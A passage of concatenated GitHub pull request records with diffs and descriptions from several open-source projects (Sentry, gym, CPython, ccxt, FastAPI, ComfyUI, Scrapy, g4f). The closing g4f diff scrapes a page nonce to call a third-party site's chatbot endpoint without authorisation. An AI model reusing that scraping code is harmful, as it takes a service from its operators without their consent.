+ "check-in was finished: attempted update from %s to %s",
+ check_in.status,
+ status,
+ )
+ return
+
if duration is None:
duration = int((start_time - check_in.date_added).total_seconds() * 1000)
diff --git a/tests/sentry/monitors/test_monitor_consumer.py b/tests/sentry/monitors/test_monitor_consumer.py
index 7407dd7b45335c..265cf0c6a4df40 100644
--- a/tests/sentry/monitors/test_monitor_consumer.py
+++ b/tests/sentry/monitors/test_monitor_consumer.py
@@ -1,6 +1,6 @@
import uuid
from datetime import datetime
-from typing import Any, Dict
+from typing import Any, Dict, Optional
from unittest import mock
import msgpack
@@ -30,9 +30,11 @@
class MonitorConsumerTest(TestCase):
- def get_message(self, monitor_slug: str, **overrides: Any) -> Dict[str, Any]:
+ def get_message(
+ self, monitor_slug: str, guid: Optional[str] = None, **overrides: Any
+ ) -> Dict[str, Any]:
now = datetime.now()
- self.guid = uuid.uuid4().hex
+ self.guid = uuid.uuid4().hex if not guid else guid
payload = {
"monitor_slug": monitor_slug,
"status": "ok",
@@ -164,13 +166,29 @@ def test_disabled(self):
@pytest.mark.django_db
def test_check_in_update(self):
monitor = self._create_monitor(slug="my-monitor")
- message = self.get_message(monitor.slug)
- _process_message(message)
- _process_message(message)
+ _process_message(self.get_message(monitor.slug, status="in_progress"))
+ _process_message(self.get_message(monitor.slug, guid=self.guid))
checkin = MonitorCheckIn.objects.get(guid=self.guid)
assert checkin.duration is not None
+ @pytest.mark.django_db
+ def test_check_in_update_terminal(self):
+ monitor = self._create_monitor(slug="my-monitor")
+ done_message = self.get_message(monitor.slug, duration=10.0)
+ _process_message(done_message)
+ _process_message(self.get_message(monitor.slug, guid=self.guid, status="in_progress"))
+
+ checkin = MonitorCheckIn.objects.get(guid=self.guid)
+ assert checkin.duration == int(10.0 * 1000)
+
+ error_message = self.get_message(monitor.slug, duration=20.0, status="error")
+ _process_message(error_message)
+ _process_message(self.get_message(monitor.slug, guid=self.guid, status="in_progress"))
+
+ checkin = MonitorCheckIn.objects.get(guid=self.guid)
+ assert checkin.duration == int(20.0 * 1000)
+
@pytest.mark.django_db
def test_monitor_environment(self):
monitor = self._create_monitor(slug="my-monitor")
| Fixes incorrectly "re-opening" of closed check-ins on the consumer. Validation logic now lines up with HTTP API | https://api.github.com/repos/getsentry/sentry/pulls/49357 | 2023-05-17T20:31:15Z | 2023-05-17T20:54:18Z | 2023-05-17T20:54:18Z | 2023-06-02T01:16:39Z | 832 | getsentry/sentry | 44,766 |
Video recorder: distinguish input and output fps | diff --git a/gym/wrappers/monitoring/video_recorder.py b/gym/wrappers/monitoring/video_recorder.py
index 88a35e5a667..7af82bf026f 100644
--- a/gym/wrappers/monitoring/video_recorder.py
+++ b/gym/wrappers/monitoring/video_recorder.py
@@ -76,6 +76,7 @@ def __init__(self, env, path=None, metadata=None, enabled=True, base_path=None):
touch(path)
self.frames_per_sec = env.metadata.get('video.frames_per_second', 30)
+ self.output_frames_per_sec = env.metadata.get('video.output_frames_per_second', self.frames_per_sec)
self.encoder = None # lazily start the process
self.broken = False
@@ -159,7 +160,7 @@ def _encode_ansi_frame(self, frame):
def _encode_image_frame(self, frame):
if not self.encoder:
- self.encoder = ImageEncoder(self.path, frame.shape, self.frames_per_sec)
+ self.encoder = ImageEncoder(self.path, frame.shape, self.frames_per_sec, self.output_frames_per_sec)
self.metadata['encoder_version'] = self.encoder.version_info
try:
@@ -235,7 +236,7 @@ def version_info(self):
return {'backend':'TextEncoder','version':1}
class ImageEncoder(object):
- def __init__(self, output_path, frame_shape, frames_per_sec):
+ def __init__(self, output_path, frame_shape, frames_per_sec, output_frames_per_sec):
self.proc = None
self.output_path = output_path
# Frame shape should be lines-first, so w and h are swapped
@@ -246,6 +247,7 @@ def __init__(self, output_path, frame_shape, frames_per_sec):
self.includes_alpha = (pixfmt == 4)
self.frame_shape = frame_shape
self.frames_per_sec = frames_per_sec
+ self.output_frames_per_sec = output_frames_per_sec
if distutils.spawn.find_executable('avconv') is not None:
self.backend = 'avconv'
@@ -270,18 +272,19 @@ def start(self):
'-nostats',
'-loglevel', 'error', # suppress warnings
'-y',
- '-r', '%d' % self.frames_per_sec,
# input
'-f', 'rawvideo',
'-s:v', '{}x{}'.format(*self.wh),
'-pix_fmt',('rgb32' if self.includes_alpha else 'rgb24'),
+ '-framerate', '%d' % self.frames_per_sec,
'-i', '-', # this used to be /dev/stdin, which is not Windows-friendly
# output
'-vf', 'scale=trunc(iw/2)*2:trunc(ih/2)*2',
'-vcodec', 'libx264',
'-pix_fmt', 'yuv420p',
+ '-r', '%d' % self.output_frames_per_sec,
self.output_path
)
| Common video players such as VLC, or Quicktime struggle to play videos with low framerate, which is problematic for environments where the policy frequency is low (e.g. 1 Hz).
See: https://superuser.com/a/601916
This commit sets:
- The input image sequence framerate to the metadata 'video.frames_per_second'
- The output video framerate to at least 30 fps | https://api.github.com/repos/openai/gym/pulls/1817 | 2020-02-21T10:47:05Z | 2020-02-29T00:05:19Z | 2020-02-29T00:05:19Z | 2020-02-29T00:05:19Z | 671 | openai/gym | 5,856 |
bpo-43751: Fix anext() bug where it erroneously returned None | diff --git a/Lib/test/test_asyncgen.py b/Lib/test/test_asyncgen.py
index 99464e3d0929fd..77c15c02bc8914 100644
--- a/Lib/test/test_asyncgen.py
+++ b/Lib/test/test_asyncgen.py
@@ -372,11 +372,8 @@ def tearDown(self):
self.loop = None
asyncio.set_event_loop_policy(None)
- def test_async_gen_anext(self):
- async def gen():
- yield 1
- yield 2
- g = gen()
+ def check_async_iterator_anext(self, ait_class):
+ g = ait_class()
async def consume():
results = []
results.append(await anext(g))
@@ -388,6 +385,66 @@ async def consume():
with self.assertRaises(StopAsyncIteration):
self.loop.run_until_complete(consume())
+ async def test_2():
+ g1 = ait_class()
+ self.assertEqual(await anext(g1), 1)
+ self.assertEqual(await anext(g1), 2)
+ with self.assertRaises(StopAsyncIteration):
+ await anext(g1)
+ with self.assertRaises(StopAsyncIteration):
+ await anext(g1)
+
+ g2 = ait_class()
+ self.assertEqual(await anext(g2, "default"), 1)
+ self.assertEqual(await anext(g2, "default"), 2)
+ self.assertEqual(await anext(g2, "default"), "default")
+ self.assertEqual(await anext(g2, "default"), "default")
+
+ return "completed"
+
+ result = self.loop.run_until_complete(test_2())
+ self.assertEqual(result, "completed")
+
+ def test_async_generator_anext(self):
+ async def agen():
+ yield 1
+ yield 2
+ self.check_async_iterator_anext(agen)
+
+ def test_python_async_iterator_anext(self):
+ class MyAsyncIter:
+ """Asynchronously yield 1, then 2."""
+ def __init__(self):
+ self.yielded = 0
+ def __aiter__(self):
+ return self
+ async def __anext__(self):
+ if self.yielded >= 2:
+ raise StopAsyncIteration()
+ else:
+ self.yielded += 1
+ return self.yielded
+ self.check_async_iterator_anext(MyAsyncIter)
+
+ def test_python_async_iterator_types_coroutine_anext(self):
+ import types
+ class MyAsyncIterWithTypesCoro:
+ """Asynchronously yield 1, then 2."""
+ def __init__(self):
+ self.yielded = 0
+ def __aiter__(self):
+ return self
+ @types.coroutine
+ def __anext__(self):
+ if False:
+ yield "this is a generator-based coroutine"
+ if self.yielded >= 2:
+ raise StopAsyncIteration()
+ else:
+ self.yielded += 1
+ return self.yielded
+ self.check_async_iterator_anext(MyAsyncIterWithTypesCoro)
+
def test_async_gen_aiter(self):
async def gen():
yield 1
@@ -431,12 +488,85 @@ async def call_with_too_many_args():
await anext(gen(), 1, 3)
async def call_with_wrong_type_args():
await anext(1, gen())
+ async def call_with_kwarg():
+ await anext(aiterator=gen())
with self.assertRaises(TypeError):
self.loop.run_until_complete(call_with_too_few_args())
with self.assertRaises(TypeError):
self.loop.run_until_complete(call_with_too_many_args())
with self.assertRaises(TypeError):
self.loop.run_until_complete(call_with_wrong_type_args())
+ with self.assertRaises(TypeError):
+ self.loop.run_until_complete(call_with_kwarg())
+
+ def test_anext_bad_await(self):
+ async def bad_awaitable():
+ class BadAwaitable:
+ def __await__(self):
+ return 42
+ class MyAsyncIter:
+ def __aiter__(self):
+ return self
+ def __anext__(self):
+ return BadAwaitable()
+ regex = r"__await__.*iterator"
+ awaitable = anext(MyAsyncIter(), "default")
+ with self.assertRaisesRegex(TypeError, regex):
+ await awaitable
+ awaitable = anext(MyAsyncIter())
+ with self.assertRaisesRegex(TypeError, regex):
+ await awaitable
+ return "completed"
+ result = self.loop.run_until_complete(bad_awaitable())
+ self.assertEqual(result, "completed")
+
+ async def check_anext_returning_iterator(self, aiter_class):
+ awaitable = anext(aiter_class(), "default")
+ with self.assertRaises(TypeError):
+ await awaitable
+ awaitable = anext(aiter_class())
+ with self.assertRaises(TypeError):
+ await awaitable
+ return "completed"
+
+ def test_anext_return_iterator(self):
+ class WithIterAnext:
+ def __aiter__(self):
+ return self
+ def __anext__(self):
+ return iter("abc")
+ result = self.loop.run_until_complete(self.check_anext_returning_iterator(WithIterAnext))
+ self.assertEqual(result, "completed")
+
+ def test_anext_return_generator(self):
+ class WithGenAnext:
+ def __aiter__(self):
+ return self
+ def __anext__(self):
+ yield
+ result = self.loop.run_until_complete(self.check_anext_returning_iterator(WithGenAnext))
+ self.assertEqual(result, "completed")
+
+ def test_anext_await_raises(self):
+ class RaisingAwaitable:
+ def __await__(self):
+ raise ZeroDivisionError()
+ yield
+ class WithRaisingAwaitableAnext:
+ def __aiter__(self):
+ return self
+ def __anext__(self):
+ return RaisingAwaitable()
+ async def do_test():
+ awaitable = anext(WithRaisingAwaitableAnext())
+ with self.assertRaises(ZeroDivisionError):
+ await awaitable
+ awaitable = anext(WithRaisingAwaitableAnext(), "default")
+ with self.assertRaises(ZeroDivisionError):
+ await awaitable
+ return "completed"
+ result = self.loop.run_until_complete(do_test())
+ self.assertEqual(result, "completed")
def test_aiter_bad_args(self):
async def gen():
diff --git a/Misc/NEWS.d/next/Core and Builtins/2021-04-07-18-00-05.bpo-43751.8fHsqQ.rst b/Misc/NEWS.d/next/Core and Builtins/2021-04-07-18-00-05.bpo-43751.8fHsqQ.rst
new file mode 100644
index 00000000000000..75951ae794d106
--- /dev/null
+++ b/Misc/NEWS.d/next/Core and Builtins/2021-04-07-18-00-05.bpo-43751.8fHsqQ.rst
@@ -0,0 +1 @@
+Fixed a bug where ``anext(ait, default)`` would erroneously return None.
\ No newline at end of file
diff --git a/Objects/iterobject.c b/Objects/iterobject.c
index f0c6b799176804..c316de4e32c6b2 100644
--- a/Objects/iterobject.c
+++ b/Objects/iterobject.c
@@ -316,7 +316,52 @@ anextawaitable_traverse(anextawaitableobject *obj, visitproc visit, void *arg)
static PyObject *
anextawaitable_iternext(anextawaitableobject *obj)
{
- PyObject *result = PyIter_Next(obj->wrapped);
+ /* Consider the following class:
+ *
+ * class A:
+ * async def __anext__(self):
+ * ...
+ * a = A()
+ *
+ * Then `await anext(a)` should call
+ * a.__anext__().__await__().__next__()
+ *
+ * On the other hand, given
+ *
+ * async def agen():
+ * yield 1
+ * yield 2
+ * gen = agen()
+ *
+ * Then `await anext(gen)` can just call
+ * gen.__anext__().__next__()
+ */
+ assert(obj->wrapped != NULL);
+ PyObject *awaitable = _PyCoro_GetAwaitableIter(obj->wrapped);
+ if (awaitable == NULL) {
+ return NULL;
+ }
+ if (Py_TYPE(awaitable)->tp_iternext == NULL) {
+ /* _PyCoro_GetAwaitableIter returns a Coroutine, a Generator,
+ * or an iterator. Of these, only coroutines lack tp_iternext.
+ */
+ assert(PyCoro_CheckExact(awaitable));
+ unaryfunc getter = Py_TYPE(awaitable)->tp_as_async->am_await;
+ PyObject *new_awaitable = getter(awaitable);
+ if (new_awaitable == NULL) {
+ Py_DECREF(awaitable);
+ return NULL;
+ }
+ Py_SETREF(awaitable, new_awaitable);
+ if (Py_TYPE(awaitable)->tp_iternext == NULL) {
+ PyErr_SetString(PyExc_TypeError,
+ "__await__ returned a non-iterable");
+ Py_DECREF(awaitable);
+ return NULL;
+ }
+ }
+ PyObject *result = (*Py_TYPE(awaitable)->tp_iternext)(awaitable);
+ Py_DECREF(awaitable);
if (result != NULL) {
return result;
}
| <!--
Thanks for your contribution!
Please read this comment in its entirety. It's quite important.
# Pull Request title
It should be in the following format:
```
bpo-NNNN: Summary of the changes made
```
Where: bpo-NNNN refers to the issue number in the https://bugs.python.org.
Most PRs will require an issue number. Trivial changes, like fixing a typo, do not need an issue.
# Backport Pull Request title
If this is a backport PR (PR made against branches other than `master`),
please ensure that the PR title is in the following format:
```
[X.Y] <title from the original PR> (GH-NNNN)
```
Where: [X.Y] is the branch name, e.g. [3.6].
GH-NNNN refers to the PR number from `master`.
-->
<!-- issue-number: [bpo-43751](https://bugs.python.org/issue43751) -->
https://bugs.python.org/issue43751
<!-- /issue-number -->
| https://api.github.com/repos/python/cpython/pulls/25238 | 2021-04-07T00:36:39Z | 2021-04-11T04:51:36Z | 2021-04-11T04:51:36Z | 2021-12-19T05:46:56Z | 2,230 | python/cpython | 4,466 |
btcturk: use string in safeTicker ccxt/ccxt#11379 | diff --git a/js/btcturk.js b/js/btcturk.js
index 02891213cee5..29d9a2ef7906 100644
--- a/js/btcturk.js
+++ b/js/btcturk.js
@@ -289,29 +289,29 @@ module.exports = class btcturk extends Exchange {
market = this.safeMarket (marketId, market);
const symbol = market['symbol'];
const timestamp = this.safeInteger (ticker, 'timestamp');
- const last = this.safeNumber (ticker, 'last');
+ const last = this.safeString (ticker, 'last');
return this.safeTicker ({
'symbol': symbol,
'timestamp': timestamp,
'datetime': this.iso8601 (timestamp),
- 'high': this.safeNumber (ticker, 'high'),
- 'low': this.safeNumber (ticker, 'low'),
- 'bid': this.safeNumber (ticker, 'bid'),
+ 'high': this.safeString (ticker, 'high'),
+ 'low': this.safeString (ticker, 'low'),
+ 'bid': this.safeString (ticker, 'bid'),
'bidVolume': undefined,
- 'ask': this.safeNumber (ticker, 'ask'),
+ 'ask': this.safeString (ticker, 'ask'),
'askVolume': undefined,
'vwap': undefined,
- 'open': this.safeNumber (ticker, 'open'),
+ 'open': this.safeString (ticker, 'open'),
'close': last,
'last': last,
'previousClose': undefined,
- 'change': this.safeNumber (ticker, 'daily'),
- 'percentage': this.safeNumber (ticker, 'dailyPercent'),
- 'average': this.safeNumber (ticker, 'average'),
- 'baseVolume': this.safeNumber (ticker, 'volume'),
+ 'change': this.safeString (ticker, 'daily'),
+ 'percentage': this.safeString (ticker, 'dailyPercent'),
+ 'average': this.safeString (ticker, 'average'),
+ 'baseVolume': this.safeString (ticker, 'volume'),
'quoteVolume': undefined,
'info': ticker,
- }, market);
+ }, market, false);
}
async fetchTickers (symbols = undefined, params = {}) {
| ccxt/ccxt#11379 | https://api.github.com/repos/ccxt/ccxt/pulls/11459 | 2022-01-19T15:26:26Z | 2022-01-21T22:58:59Z | 2022-01-21T22:58:59Z | 2022-01-21T22:58:59Z | 510 | ccxt/ccxt | 13,465 |
🌐 Add Chinese translation for Advanced - Additional Status Codes | diff --git a/docs/zh/docs/advanced/additional-status-codes.md b/docs/zh/docs/advanced/additional-status-codes.md
new file mode 100644
index 0000000000000..1cb724f1db142
--- /dev/null
+++ b/docs/zh/docs/advanced/additional-status-codes.md
@@ -0,0 +1,37 @@
+# 额外的状态码
+
+**FastAPI** 默认使用 `JSONResponse` 返回一个响应,将你的 *路径操作* 中的返回内容放到该 `JSONResponse` 中。
+
+**FastAPI** 会自动使用默认的状态码或者使用你在 *路径操作* 中设置的状态码。
+
+## 额外的状态码
+
+如果你想要返回主要状态码之外的状态码,你可以通过直接返回一个 `Response` 来实现,比如 `JSONResponse`,然后直接设置额外的状态码。
+
+例如,假设你想有一个 *路径操作* 能够更新条目,并且更新成功时返回 200 「成功」 的 HTTP 状态码。
+
+但是你也希望它能够接受新的条目。并且当这些条目不存在时,会自动创建并返回 201 「创建」的 HTTP 状态码。
+
+要实现它,导入 `JSONResponse`,然后在其中直接返回你的内容,并将 `status_code` 设置为为你要的值。
+
+```Python hl_lines="2 19"
+{!../../../docs_src/additional_status_codes/tutorial001.py!}
+```
+
+!!! warning "警告"
+ 当你直接返回一个像上面例子中的 `Response` 对象时,它会直接返回。
+
+ FastAPI 不会用模型等对该响应进行序列化。
+
+ 确保其中有你想要的数据,且返回的值为合法的 JSON(如果你使用 `JSONResponse` 的话)。
+
+!!! note "技术细节"
+ 你也可以使用 `from starlette.responses import JSONResponse`。
+
+ 出于方便,**FastAPI** 为开发者提供同 `starlette.responses` 一样的 `fastapi.responses`。但是大多数可用的响应都是直接来自 Starlette。`status` 也是一样。
+
+## OpenAPI 和 API 文档
+
+如果你直接返回额外的状态码和响应,它们不会包含在 OpenAPI 方案(API 文档)中,因为 FastAPI 没办法预先知道你要返回什么。
+
+但是你可以使用 [额外的响应](additional-responses.md){.internal-link target=_blank} 在代码中记录这些内容。
diff --git a/docs/zh/mkdocs.yml b/docs/zh/mkdocs.yml
index c57aae8cc452c..f50c080f9506d 100644
--- a/docs/zh/mkdocs.yml
+++ b/docs/zh/mkdocs.yml
@@ -63,6 +63,7 @@ nav:
- 高级用户指南:
- advanced/index.md
- advanced/path-operation-advanced-configuration.md
+ - advanced/additional-status-codes.md
- deployment.md
- contributing.md
- help-fastapi.md
| Add Chinese docs for advanced/additional-status-codes | https://api.github.com/repos/tiangolo/fastapi/pulls/1451 | 2020-05-22T03:08:49Z | 2020-11-25T17:16:21Z | 2020-11-25T17:16:21Z | 2020-11-25T17:16:21Z | 712 | tiangolo/fastapi | 23,011 |
Simple undo/redo | diff --git a/web/extensions/core/undoRedo.js b/web/extensions/core/undoRedo.js
new file mode 100644
index 0000000000..c6613b0f02
--- /dev/null
+++ b/web/extensions/core/undoRedo.js
@@ -0,0 +1,150 @@
+import { app } from "../../scripts/app.js";
+
+const MAX_HISTORY = 50;
+
+let undo = [];
+let redo = [];
+let activeState = null;
+let isOurLoad = false;
+function checkState() {
+ const currentState = app.graph.serialize();
+ if (!graphEqual(activeState, currentState)) {
+ undo.push(activeState);
+ if (undo.length > MAX_HISTORY) {
+ undo.shift();
+ }
+ activeState = clone(currentState);
+ redo.length = 0;
+ }
+}
+
+const loadGraphData = app.loadGraphData;
+app.loadGraphData = async function () {
+ const v = await loadGraphData.apply(this, arguments);
+ if (isOurLoad) {
+ isOurLoad = false;
+ } else {
+ checkState();
+ }
+ return v;
+};
+
+function clone(obj) {
+ try {
+ if (typeof structuredClone !== "undefined") {
+ return structuredClone(obj);
+ }
+ } catch (error) {
+ // structuredClone is stricter than using JSON.parse/stringify so fallback to that
+ }
+
+ return JSON.parse(JSON.stringify(obj));
+}
+
+function graphEqual(a, b, root = true) {
+ if (a === b) return true;
+
+ if (typeof a == "object" && a && typeof b == "object" && b) {
+ const keys = Object.getOwnPropertyNames(a);
+
+ if (keys.length != Object.getOwnPropertyNames(b).length) {
+ return false;
+ }
+
+ for (const key of keys) {
+ let av = a[key];
+ let bv = b[key];
+ if (root && key === "nodes") {
+ // Nodes need to be sorted as the order changes when selecting nodes
+ av = [...av].sort((a, b) => a.id - b.id);
+ bv = [...bv].sort((a, b) => a.id - b.id);
+ }
+ if (!graphEqual(av, bv, false)) {
+ return false;
+ }
+ }
+
+ return true;
+ }
+
+ return false;
+}
+
+const undoRedo = async (e) => {
+ if (e.ctrlKey || e.metaKey) {
+ if (e.key === "y") {
+ const prevState = redo.pop();
+ if (prevState) {
+ undo.push(activeState);
+ isOurLoad = true;
+ await app.loadGraphData(prevState);
+ activeState = prevState;
+ }
+ return true;
+ } else if (e.key === "z") {
+ const prevState = undo.pop();
+ if (prevState) {
+ redo.push(activeState);
+ isOurLoad = true;
+ await app.loadGraphData(prevState);
+ activeState = prevState;
+ }
+ return true;
+ }
+ }
+};
+
+const bindInput = (activeEl) => {
+ if (activeEl?.tagName !== "CANVAS" && activeEl?.tagName !== "BODY") {
+ for (const evt of ["change", "input", "blur"]) {
+ if (`on${evt}` in activeEl) {
+ const listener = () => {
+ checkState();
+ activeEl.removeEventListener(evt, listener);
+ };
+ activeEl.addEventListener(evt, listener);
+ return true;
+ }
+ }
+ }
+};
+
+window.addEventListener(
+ "keydown",
+ (e) => {
+ requestAnimationFrame(async () => {
+ const activeEl = document.activeElement;
+ if (activeEl?.tagName === "INPUT" || activeEl?.type === "textarea") {
+ // Ignore events on inputs, they have their native history
+ return;
+ }
+
+ // Check if this is a ctrl+z ctrl+y
+ if (await undoRedo(e)) return;
+
+ // If our active element is some type of input then handle changes after they're done
+ if (bindInput(activeEl)) return;
+ checkState();
+ });
+ },
+ true
+);
+
+// Handle clicking DOM elements (e.g. widgets)
+window.addEventListener("mouseup", () => {
+ checkState();
+});
+
+// Handle litegraph clicks
+const processMouseUp = LGraphCanvas.prototype.processMouseUp;
+LGraphCanvas.prototype.processMouseUp = function (e) {
+ const v = processMouseUp.apply(this, arguments);
+ checkState();
+ return v;
+};
+const processMouseDown = LGraphCanvas.prototype.processMouseDown;
+LGraphCanvas.prototype.processMouseDown = function (e) {
+ const v = processMouseDown.apply(this, arguments);
+ checkState();
+ return v;
+};
| Adds a very simple undo/redo implemetation.
Litegraph has some beginnings of before/after change events however its missing from a lot of key actions.
This just handles mouse/keyboard events to check if there are any changes in the graph vs the previous, which seems like a reliable way of catching any changes.
It stores the entire serialized graph for each history state which isn't great, but with a limited size of 50 it should be fine in real use | https://api.github.com/repos/comfyanonymous/ComfyUI/pulls/2080 | 2023-11-27T18:57:39Z | 2023-11-28T03:41:58Z | 2023-11-28T03:41:58Z | 2023-11-29T09:03:19Z | 1,142 | comfyanonymous/ComfyUI | 17,830 |
✨ Support Python internal description on Pydantic model's docstring | diff --git a/fastapi/utils.py b/fastapi/utils.py
index 0ced0125223a4..89f54453b5a90 100644
--- a/fastapi/utils.py
+++ b/fastapi/utils.py
@@ -37,6 +37,8 @@ def get_model_definitions(
)
definitions.update(m_definitions)
model_name = model_name_map[model]
+ if "description" in m_schema:
+ m_schema["description"] = m_schema["description"].split("\f")[0]
definitions[model_name] = m_schema
return definitions
| ## Problem
Currently, on FastAPI endpoint functions we can document for OpenAPI description/Swagger and for internal Python purposes:
```python
from fastapi import FastAPI
from pydantic import BaseModel
app = FastAPI()
@app.get("/")
def useful():
"""My description.
\f
Internal documentation.
"""
...
```
On Swagger we'll have:
![image](https://user-images.githubusercontent.com/7353520/113333626-f3008200-9322-11eb-9f9c-ca6ba5782d25.png)
When documenting models, it doesn't have the same behavior:
```python
from enum import Enum
from fastapi import FastAPI
class Banana(str, Enum):
"""My description.
\f
Internal documentation.
"""
HAHA = "haha"
HOHO = "hoho"
app = FastAPI()
@app.get("/")
def useful(banana: Banana):
...
```
On Swagger, we'll have:
![image](https://user-images.githubusercontent.com/7353520/113333882-48d52a00-9323-11eb-8d0e-eef8cc965d04.png)
## Solution
The proposed _two lines of code_ on this PR, makes it possible to have the same behavior as the endpoint description:
![image](https://user-images.githubusercontent.com/7353520/113334003-6e623380-9323-11eb-849d-750a85f7847c.png)
It follows the same idea as: https://github.com/tiangolo/fastapi/blob/10397ddc30ef9bb26e9247f04fe20ce3045081c4/fastapi/routing.py#L350
## Related issues
- https://github.com/tiangolo/fastapi/issues/3024
## Questions & Alternatives
- Should Pydantic handle this on the [model_process_schema()](https://github.com/samuelcolvin/pydantic/blob/e68c277afe6bf6e7966bfecfe9b228d33f2de44b/pydantic/schema.py#L519) function instead? | https://api.github.com/repos/tiangolo/fastapi/pulls/3032 | 2021-04-01T17:51:57Z | 2022-09-02T12:43:22Z | 2022-09-02T12:43:22Z | 2022-09-02T13:22:35Z | 125 | tiangolo/fastapi | 22,833 |
base WS - fix headers | diff --git a/php/pro/Client.php b/php/pro/Client.php
index 90ed16d4cac0..7af211f45c06 100644
--- a/php/pro/Client.php
+++ b/php/pro/Client.php
@@ -142,7 +142,8 @@ public function create_connection() {
if ($this->verbose) {
echo date('c'), ' connecting to ', $this->url, "\n";
}
- $promise = call_user_func($this->connector, $this->url);
+ $headers = property_exists($this, 'options') && array_key_exists('headers', $this->options) ? $this->options['headers'] : [];
+ $promise = call_user_func($this->connector, $this->url, [], $headers);
Timer\timeout($promise, $timeout, Loop::get())->then(
function($connection) {
if ($this->verbose) {
| fix #15665
eventually i was able to find out the reason for that issue in WS base files - they were not setting $headers at all and all options set inside `describe` was just ignored.
| https://api.github.com/repos/ccxt/ccxt/pulls/15719 | 2022-11-17T07:28:24Z | 2022-11-17T09:34:34Z | 2022-11-17T09:34:34Z | 2022-11-17T10:55:55Z | 203 | ccxt/ccxt | 13,434 |
Add release notes for 1.0.6 | diff --git a/docs/news.rst b/docs/news.rst
index 3e60b2b4f8c..8dd3261c942 100644
--- a/docs/news.rst
+++ b/docs/news.rst
@@ -3,6 +3,14 @@
Release notes
=============
+1.0.6 (2016-05-04)
+------------------
+
+- FIX: RetryMiddleware is now robust to non-standard HTTP status codes (:issue:`1857`)
+- FIX: Filestorage HTTP cache was checking wrong modified time (:issue:`1875`)
+- DOC: Support for Sphinx 1.4+ (:issue:`1893`)
+- DOC: Consistency in selectors examples (:issue:`1869`)
+
1.0.5 (2016-02-04)
------------------
| https://api.github.com/repos/scrapy/scrapy/pulls/1966 | 2016-05-04T14:13:30Z | 2016-05-04T14:27:29Z | 2016-05-04T14:27:29Z | 2016-05-17T15:55:25Z | 173 | scrapy/scrapy | 34,998 |
|
add SwiftLearner | diff --git a/README.md b/README.md
index 306feff9..8353b0e0 100644
--- a/README.md
+++ b/README.md
@@ -1149,6 +1149,7 @@ on MNIST digits[DEEP LEARNING]
* [FlinkML in Apache Flink](https://ci.apache.org/projects/flink/flink-docs-master/apis/batch/libs/ml/index.html) - Distributed machine learning library in Flink
* [DynaML](https://github.com/mandar2812/DynaML) - Scala Library/REPL for Machine Learning Research
* [Saul](https://github.com/IllinoisCogComp/saul/) - Flexible Declarative Learning-Based Programming.
+* [SwiftLearner](https://github.com/valdanylchuk/swiftlearner/) - Simply written algorithms to help study ML or write your own implementations.
<a name="swift" />
## Swift
| https://api.github.com/repos/josephmisiti/awesome-machine-learning/pulls/304 | 2016-08-22T22:56:13Z | 2016-08-23T20:49:03Z | 2016-08-23T20:49:03Z | 2016-08-23T20:49:06Z | 207 | josephmisiti/awesome-machine-learning | 52,213 |
|
Fix Chatgpt4Online Provider | diff --git a/g4f/Provider/AiAsk.py b/g4f/Provider/AiAsk.py
index ac123fc98f..094ef07675 100644
--- a/g4f/Provider/AiAsk.py
+++ b/g4f/Provider/AiAsk.py
@@ -8,7 +8,7 @@ class AiAsk(AsyncGeneratorProvider):
url = "https://e.aiask.me"
supports_message_history = True
supports_gpt_35_turbo = True
- working = True
+ working = False
@classmethod
async def create_async_generator(
diff --git a/g4f/Provider/Aichat.py b/g4f/Provider/Aichat.py
index 77ae44291a..41ea9a96f4 100644
--- a/g4f/Provider/Aichat.py
+++ b/g4f/Provider/Aichat.py
@@ -8,8 +8,8 @@
from ..requests import StreamSession
class Aichat(AsyncProvider):
- url = "https://chat-gpt.org/chat"
- working = True
+ url = "https://chat-gpt.org/chat"
+ working = False
supports_gpt_35_turbo = True
@staticmethod
diff --git a/g4f/Provider/Chatgpt4Online.py b/g4f/Provider/Chatgpt4Online.py
index d75096392f..57ab948253 100644
--- a/g4f/Provider/Chatgpt4Online.py
+++ b/g4f/Provider/Chatgpt4Online.py
@@ -1,42 +1,44 @@
from __future__ import annotations
-import json
+import re
from aiohttp import ClientSession
-from ..typing import AsyncResult, Messages
-from .base_provider import AsyncGeneratorProvider
+from ..typing import Messages
+from .base_provider import AsyncProvider
+from .helper import format_prompt
-
-class Chatgpt4Online(AsyncGeneratorProvider):
+class Chatgpt4Online(AsyncProvider):
url = "https://chatgpt4online.org"
supports_message_history = True
supports_gpt_35_turbo = True
- working = False
+ working = True
+ _wpnonce = None
@classmethod
- async def create_async_generator(
+ async def create_async(
cls,
model: str,
messages: Messages,
proxy: str = None,
**kwargs
- ) -> AsyncResult:
+ ) -> str:
async with ClientSession() as session:
+ if not cls._wpnonce:
+ async with session.get(f"{cls.url}/", proxy=proxy) as response:
+ response.raise_for_status()
+ response = await response.text()
+ if result := re.search(r'data-nonce="(.*?)"', response):
+ cls._wpnonce = result.group(1)
+ else:
+ raise RuntimeError("No nonce found")
data = {
- "botId": "default",
- "customId": None,
- "session": "N/A",
- "chatId": "",
- "contextId": 58,
- "messages": messages,
- "newMessage": messages[-1]["content"],
- "stream": True
+ "_wpnonce": cls._wpnonce,
+ "post_id": 58,
+ "url": "https://chatgpt4online.org",
+ "action": "wpaicg_chat_shortcode_message",
+ "message": format_prompt(messages),
+ "bot_id": 3405
}
-
- async with session.post(f"{cls.url}/wp-json/mwai-ui/v1/chats/submit", json=data, proxy=proxy) as response:
+ async with session.post(f"{cls.url}/rizq", data=data, proxy=proxy) as response:
response.raise_for_status()
- async for line in response.content:
- if line.startswith(b"data: "):
- line = json.loads(line[6:])
- if line["type"] == "live":
- yield line["data"]
\ No newline at end of file
+ return (await response.json())["data"]
\ No newline at end of file
diff --git a/g4f/Provider/FreeGpt.py b/g4f/Provider/FreeGpt.py
index a3a26fe657..22c6c9aa43 100644
--- a/g4f/Provider/FreeGpt.py
+++ b/g4f/Provider/FreeGpt.py
@@ -12,7 +12,7 @@
class FreeGpt(AsyncGeneratorProvider):
url = "https://freegpts1.aifree.site/"
- working = True
+ working = False
supports_message_history = True
supports_gpt_35_turbo = True
diff --git a/g4f/Provider/__init__.py b/g4f/Provider/__init__.py
index a72db45c4c..70ad9de72b 100644
--- a/g4f/Provider/__init__.py
+++ b/g4f/Provider/__init__.py
@@ -1,9 +1,6 @@
from __future__ import annotations
-from .Acytoo import Acytoo
from .AiAsk import AiAsk
-from .Aibn import Aibn
from .Aichat import Aichat
-from .Ails import Ails
from .AItianhu import AItianhu
from .AItianhuSpace import AItianhuSpace
from .Berlin import Berlin
@@ -13,11 +10,9 @@
from .Chatgpt4Online import Chatgpt4Online
